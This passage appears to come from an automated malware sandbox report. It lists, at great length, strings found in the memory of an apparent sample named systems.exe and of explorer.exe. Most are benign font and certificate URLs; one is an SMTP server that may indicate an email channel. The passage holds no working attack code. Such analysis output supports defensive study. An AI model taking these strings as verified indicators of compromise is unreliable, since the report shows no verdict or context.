00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818255606.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
              Source: systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457188901.00000000061A5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: explorer.exe, 0000001E.00000002.818546416.000000000459F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mDD
              Source: explorer.exe, 00000020.00000002.815012293.00000000057C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mZ
              Source: explorer.exe, 00000022.00000002.816968535.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.816155113.0000000005429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mgg
              Source: explorer.exe, 0000001B.00000002.816186087.00000000053C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.819234756.0000000004618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
              Source: systems.exe, 00000007.00000002.817146400.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: systems.exe, 00000007.00000002.818473425.000000000273C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.gmail.com
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlw
              Source: systems.exe, 00000007.00000003.415258973.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415116859.0000000006EF5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415023457.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415470289.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414750139.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
              Source: systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comD
              Source: systems.exe, 00000007.00000003.415470289.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comON
              Source: systems.exe, 00000007.00000003.415116859.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comSma
              Source: systems.exe, 00000007.00000003.415258973.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comTC
              Source: systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comTex
              Source: systems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comg
              Source: systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comi
              Source: systems.exe, 00000007.00000003.415258973.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comitkO
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: systems.exe, 00000007.00000003.415116859.0000000006EF5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn-u
              Source: systems.exe, 00000007.00000003.415470289.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como=
              Source: systems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comsig
              Source: systems.exe, 00000007.00000003.415258973.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comt
              Source: systems.exe, 00000007.00000003.451835767.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428310301.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451120837.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450386784.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451358905.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452320757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451607757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428310301.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422256465.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425049325.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424890569.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.421943470.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422095171.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/S
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: systems.exe, 00000007.00000003.421480167.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: systems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlPG
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425049325.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424890569.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424472735.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425479830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlp
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: systems.exe, 00000007.00000002.824503837.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersY
              Source: systems.exe, 00000007.00000002.824503837.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersico
              Source: systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428310301.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428881889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428711021.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.429083181.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428551965.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441472380.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.429229307.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
              Source: systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424472735.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFx
              Source: systems.exe, 00000007.00000003.421480167.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
              Source: systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic9
              Source: systems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalicS
              Source: systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426303683.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426081001.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426446779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsFE
              Source: systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426303683.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426081001.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425479830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426446779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom
              Source: systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425049325.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424890569.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426303683.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426081001.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomda
              Source: systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428310301.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426303683.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423319847.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426081001.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
              Source: systems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423319847.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423679779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423852630.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422681830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423496830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comda
              Source: systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdu
              Source: systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424472735.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comessed
              Source: systems.exe, 00000007.00000003.451835767.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451120837.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450386784.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451358905.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452320757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451607757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441472380.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449653969.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449871222.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450875400.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450170584.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450609069.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452067543.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgreta
              Source: systems.exe, 00000007.00000003.422681830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrito
              Source: systems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.421635051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423319847.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423679779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423852630.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423496830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
              Source: systems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423319847.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423679779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423852630.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423496830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitu
              Source: systems.exe, 00000007.00000003.421480167.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
